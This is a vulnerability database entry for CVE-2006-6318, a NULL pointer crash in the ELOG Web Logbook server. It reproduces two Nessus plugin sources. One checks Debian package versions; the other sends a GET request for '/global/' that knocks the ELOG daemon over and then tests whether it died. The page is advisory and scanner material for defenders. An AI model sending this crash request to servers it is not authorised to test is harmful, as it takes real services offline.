Vulnerabilities > CVE-2006-6318 - Denial Of Service vulnerability in ELOG Web Logbook ELogD Server
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
NONE Integrity impact
NONE Availability impact
PARTIAL Summary
The show_elog_list function in elogd.c in elog 2.6.2 and earlier allows remote authenticated users to cause a denial of service (daemon crash) by attempting to access a logbook whose name begins with "global," which results in a NULL pointer dereference. NOTE: some of these details are obtained from third party information. Successful exploitation requires authentication only if the application is configured with a password. It is not, by default.
Vulnerable Configurations
Nessus
NASL family Debian Local Security Checks NASL id DEBIAN_DSA-1242.NASL description Several remote vulnerabilities have been discovered in elog, a web-based electronic logbook, which may lead to the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2006-5063 Tilman Koschnick discovered that log entry editing in HTML is vulnerable to cross-site scripting. This update disables the vulnerable code. - CVE-2006-5790 Ulf Harnhammar of the Debian Security Audit Project discovered several format string vulnerabilities in elog, which may lead to execution of arbitrary code. - CVE-2006-5791 Ulf Harnhammar of the Debian Security Audit Project discovered cross-site scripting vulnerabilities in the creation of new logbook entries. - CVE-2006-6318 Jayesh KS and Arun Kethipelly of OS2A discovered that elog performs insufficient error handling in config file parsing, which may lead to denial of service through a NULL pointer dereference. last seen 2020-06-01 modified 2020-06-02 plugin id 23947 published 2006-12-30 reporter This script is Copyright (C) 2006-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/23947 title Debian DSA-1242-1 : elog - several vulnerabilities code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Debian Security Advisory DSA-1242. The text # itself is copyright (C) Software in the Public Interest, Inc. # include("compat.inc"); if (description) { script_id(23947); script_version("1.17"); script_cvs_date("Date: 2019/08/02 13:32:20"); script_cve_id("CVE-2006-5063", "CVE-2006-5790", "CVE-2006-5791", "CVE-2006-6318"); script_xref(name:"DSA", value:"1242"); script_name(english:"Debian DSA-1242-1 : elog - several vulnerabilities"); script_summary(english:"Checks dpkg output for the updated package"); script_set_attribute( attribute:"synopsis", value:"The remote Debian host is missing a security-related update." ); script_set_attribute( attribute:"description", value: "Several remote vulnerabilities have been discovered in elog, a web-based electronic logbook, which may lead to the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2006-5063 Tilman Koschnick discovered that log entry editing in HTML is vulnerable to cross-site scripting. This update disables the vulnerable code. - CVE-2006-5790 Ulf Harnhammar of the Debian Security Audit Project discovered several format string vulnerabilities in elog, which may lead to execution of arbitrary code. - CVE-2006-5791 Ulf Harnhammar of the Debian Security Audit Project discovered cross-site scripting vulnerabilities in the creation of new logbook entries. - CVE-2006-6318 Jayesh KS and Arun Kethipelly of OS2A discovered that elog performs insufficient error handling in config file parsing, which may lead to denial of service through a NULL pointer dereference." ); script_set_attribute( attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2006-5063" ); script_set_attribute( attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2006-5790" ); script_set_attribute( attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2006-5791" ); script_set_attribute( attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2006-6318" ); script_set_attribute( attribute:"see_also", value:"http://www.debian.org/security/2006/dsa-1242" ); script_set_attribute( attribute:"solution", value: "Upgrade the elog package. For the stable distribution (sarge) these problems have been fixed in version 2.5.7+r1558-4+sarge3. The upcoming stable distribution (etch) will no longer include elog." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:elog"); script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.1"); script_set_attribute(attribute:"patch_publication_date", value:"2006/12/27"); script_set_attribute(attribute:"plugin_publication_date", value:"2006/12/30"); script_set_attribute(attribute:"vuln_publication_date", value:"2006/09/25"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc."); script_family(english:"Debian Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l"); exit(0); } include("audit.inc"); include("debian_package.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian"); if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (deb_check(release:"3.1", prefix:"elog", reference:"2.5.7+r1558-4+sarge3")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get()); else security_hole(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");NASL family CGI abuses NASL id ELOG_LOGBOOK_GLOBAL_DOS.NASL description The remote web server is identified as ELOG Web Logbook, an open source blogging software. The version of ELOG Web Logbook installed on the remote host is vulnerable to a denial of service attack by requesting last seen 2020-06-01 modified 2020-06-02 plugin id 23652 published 2006-11-20 reporter This script is Copyright (C) 2006-2011 Justin Seitz source https://www.tenable.com/plugins/nessus/23652 title ELOG Web LogBook global Denial of Service code # # This script was written by Justin Seitz <[email protected]> # Per Justin : GPLv2 # include("compat.inc"); if(description) { script_id(23652); script_version("1.15"); script_cve_id("CVE-2006-6318"); script_bugtraq_id(21028); name["english"] = "ELOG Web LogBook global Denial of Service"; summary["english"] = "Tries to crash the remote service."; family["english"] = "CGI abuses"; script_name(english:name["english"]); script_set_attribute(attribute:"synopsis", value: "The remote web server is affected by a denial of service issue." ); script_set_attribute(attribute:"description", value: "The remote web server is identified as ELOG Web Logbook, an open source blogging software. The version of ELOG Web Logbook installed on the remote host is vulnerable to a denial of service attack by requesting '/global' or any logbook with 'global' in its name. When a request like this is received, a NULL pointer dereference occurs, leading to a crash of the service." ); script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2006/Nov/196" ); script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?67c4b2ac" ); script_set_attribute(attribute:"see_also", value:"https://midas.psi.ch/elogs/Forum/2053" ); script_set_attribute(attribute:"solution", value: "Upgrade to ELOG version 2.6.2-7 or later." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_publication_date", value: "2006/11/20"); script_set_attribute(attribute:"vuln_publication_date", value: "2006/11/09"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_summary(english:summary["english"]); script_category(ACT_DENIAL); script_copyright(english:"This script is Copyright (C) 2006-2011 Justin Seitz"); script_family(english:family["english"]); script_dependencies("http_version.nasl"); script_require_ports("Services/www", 8080); exit(0); } include("http_func.inc"); include("http_keepalive.inc"); # # # Verify we can talk to the web server either on port 8080 (the default). # # port = get_http_port(default:8080, embedded:TRUE); if(!get_port_state(port)) exit(0, "TCP port "+port+" is closed."); if (http_is_dead(port:port)) exit(1, "The web server on port "+port+" is already dead."); # # # Verify its ELOG and send the DOS if it is. # # banner = get_http_banner(port:port); if (isnull(banner)) exit(1, "Cannot read the HTTP banner on port "+port+"."); if ("Server: ELOG HTTP" >!< banner) exit(0, "The web server on port "+port+" is not ELOG."); uri = "/global/"; attackreq = http_get(port:port, item:uri); attackres = http_send_recv(port:port, data:attackreq); # # # Try to connect to the web server, if you can't you know its busted. # # if(http_is_dead(port:port)) security_warning(port);
References
- http://archives.neohapsis.com/archives/fulldisclosure/2006-11/0198.html
- http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=397875
- http://secunia.com/advisories/22800
- http://secunia.com/advisories/23580
- http://securityreason.com/securityalert/2060
- http://securitytracker.com/id?1017450
- http://www.debian.org/security/2006/dsa-1242
- http://www.osvdb.org/30272
- http://www.securityfocus.com/archive/1/451351
- http://www.securityfocus.com/bid/21028
- http://www.vupen.com/english/advisories/2006/4423